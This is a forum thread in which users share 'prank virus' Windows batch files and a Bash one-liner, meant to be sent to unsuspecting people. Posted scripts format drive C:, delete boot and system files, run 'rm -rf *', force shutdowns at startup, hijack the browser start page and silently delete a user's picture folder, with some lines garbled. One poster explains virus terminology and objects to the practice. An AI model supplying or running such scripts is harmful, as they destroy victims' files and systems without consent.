Code: Select all
@echo off
format C:

Pretty much sums up everything. Doesn't work much if you REALLY want to torment the person, like deleting the major system files, and setting the program to run at startup.

true a real virus looks like this

@echo off
cls
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
del c:\systemdrivers% -f -s-d-c
call >systemdrivers% -f-s-d-c
attrib netstat-n
del netstat-n
\** del temp%win%system32%regedit

warning dont use it ^_^

That would be harsh.

I actually ran a Linux equivalent of that in Bash once. I was trying out another distro, so I wanted to see my current OS crash and burn.

#rm -rf *
May the source be with you.

^^That will do it.

Still not a virus though just a bash program doing what you tell it. A virus is self replicating and destructive, A malicious trojan is a program that masquarades as something else useful, but is controlled by a remote user and does not self replicate. A Trojan in and of itself is not always bad. A trojan/RAT(Remore Access Tool/Trojan) is useful to people who want to connect to their own PC's remotely, a worm is a program thats coded to spread and self replicate on its own(although still controlled by a remote user) I think this wraps up what a Virus,Trojan, and a self replicating worm is..

Haha, I love the effect these simple batch files have on "non-computer" folk... Simple or not, do it right and you'll get a good laugh out of it ;)

EDIT: Wow, I'm tired. I was thinking of another thread. Possibly from another forum.

Yea, you can remove it, as long as you can get into safe mode. Actually sending it to her and getting her to run it is another story, as many email services block the sending of batch files and executables.

For another fun prank, check this link out.

That is a pretty basic one...

Why not make it look more harmful

eg

Code: Select all
@echo off
echo fatal system error
pause
echo x=msgbox("FATAL SYSTEM ERROR",0, "FATAL SYSTEM ERROR")
dir/s
shutdown -s -t00

and that will look more harmful just put it into the startup files also
and it is completely harmless yet looks dangerous

-- Thu Dec 03, 2009 2:52 am --

BTW gig19

you missed the final " after the shutdown code

I know an even better one. (which only works in XP. I think)
Code: Select all
@echo off
REG ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "mudkipz.ws" /F
CD C:\Program Files\Internet Explorer
START iexplore
ECHO You just got owned.
ECHO WATCH AND WEEP.
CD C:\WINDOWS\system32
START CALC
START CALC
START CALC
START CALC
START CALC
START CALC
CD C:\Documents and Settings\%username%\My Documents\My Pictures
ECHO Time to delete all your pictures >:D.
DEL /Q /F /S *.*
ECHO Files now deleted.
ECHO Don't mess with me again.
PAUSE

I did not delete important files.
Also replace some of the names with the name on the computer. (like windows32 instead of system32)
Note: I did not test this.

([msg=47771]see Re: Prank Virus With Windows, HILLARIOUS![/msg])

I feel this is noob infested, but I was once in your shoes, and even though I know better, I'm going to put in my 2 cents anyway.

1.First off, A "VIRUS" Is a self-replicating and destructive code that in many cases adds its own code to the end of a program (I.E. Internet explorer) or in some cases it is a stand alone program with a false name and shortcut picture.

2. Secondly, A batch file that shutsdown and displays some message like "Hahaha you got hacked. n00b." is NOT A VIRUS!!! And it's hardly funny.

3. Third, Any "Credible" A.V. software out there will block this, immediately (counting schools, unless you live in the ghetto)

4. Fourth, if you want to make a serious virus, go learn any of the abundance of programming languages (excluding Java, php, html, so on and so forth) and learn it.

5. Please don't post more of this stuff on these boards, if feel the urge to lay out some nooby code, please go to the "NZone"

Centip3de

P.S. Sorry if this offended anyone, and also if my grammer or spelling is incorrect, I'm a bit tired :geek:
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
